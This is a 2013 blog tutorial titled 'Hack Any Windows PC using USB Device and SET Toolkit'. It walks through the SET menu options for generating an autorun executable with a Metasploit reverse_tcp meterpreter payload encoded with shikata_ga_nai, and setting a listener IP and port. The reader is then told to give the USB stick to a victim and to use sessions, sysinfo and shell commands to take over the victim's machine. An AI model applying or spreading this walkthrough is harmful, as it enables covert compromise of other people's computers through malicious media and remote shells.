Thursday, September 5, 2013

Hack Any Windows PC using USB Device and SET Toolkit (Infectious Media Generator Attack)

ATTACK NAME : INFECTIOUS MEDIA GENRATOR ATTACK

ATTACKING OS :  ALL WINDOWS OS

THIS TECHNIQUE MOSTLY USED TO INFECT UR VICTIM USING EXECUTEABLE FILES FROM USB DEVICES. BECAUSE NOW A DAYS THE PEOPLE MOSTLY USE THE USB DEVICES TO TRANSFER DATA SO THAT'S THE REASON FOR BORN OF THE SOCIAL ENGINEERING ATTACK.

IN THIS TUTORIAL I HACKED MY OWN WINDOWS XP SP2 MACHINE..

OPEN SET TOOLKIT.


SELECT OPTION "1" => SOCIAL- ENGINEERING ATTACKS


SELECT OPTION 3 => INFECTIOUS MEDIA GENERATOR


SELECT OPTION 2 => STANDARD METASPLOIT EXECUTABLE


IT WANTS UR IP FOR REVERSE CONNECT TO UR PC..

JUST PUT UR IP ADDRESS MINE IS 192.168.152.132 SO I PUT IT THERE.


SELECT OPTION 2 => WINDOWS REVERSE_TCP METERPRETER


FOR ENECRYPT UR EXECUTABLE FILE USE ANY OF THE I WILL USE THE 
2).SHIKATA_GA_NAI

BUT ALTERNATIVE U CAN ALSO USE THE 15 AND 16 OPTION THEY ARE ALSO GOOD TO DO THE WORK...


AFTER THAT IT WANTS A PORT TO CONNECT..

I M USING THE 1234 AS A PORT...BUT U CAN USE UR OWN..


AFTER ADDING PORT THE EXECUTABLE FILE AND THE AUTORUN FILE CREATED...

U CAN GO TO THE DIRECTORY IN THE KALI LINUX SO U CAN GOT UR FILES WHICH U HAVE CREATE TO DO THIS ATTACK...

JUST SEND THIS TO FILE TO USB AND GIVE UR VICTIM .


NOW IT'S TIME TO LISTENING SO PUT "YES" AND ENETR U GOT A LISTENING SESSION.


NOW THE HANDLER IS START AND WAIT FOR THE VICTIMS ACTION.


YEAH THE VICTIM HAS ENTER THE USB IN HIS MACHINE AND THAT WHY U GOT THE SESSION 1 THERE...



ENETR THE COMMAND TO GET LIST OF OPEN SESSIONS.

COMMAND :  sessions -l




TO SELECT AND START THE SESSION JUST ENTER THE COMMAND ON TERMINAL.

COMMAND :  sessions -i ID


USE ANOTHER COMMAND TO SEE WHICH WINDOWS OS VERSION VICTIM IS USING

COMMAND :  sysinfo


TO GET A SHELL FROM THE VICTIMS PC U NEED TO ENTER THE COMMAND.

COMMAND :  shell


0 comments:

Post a Comment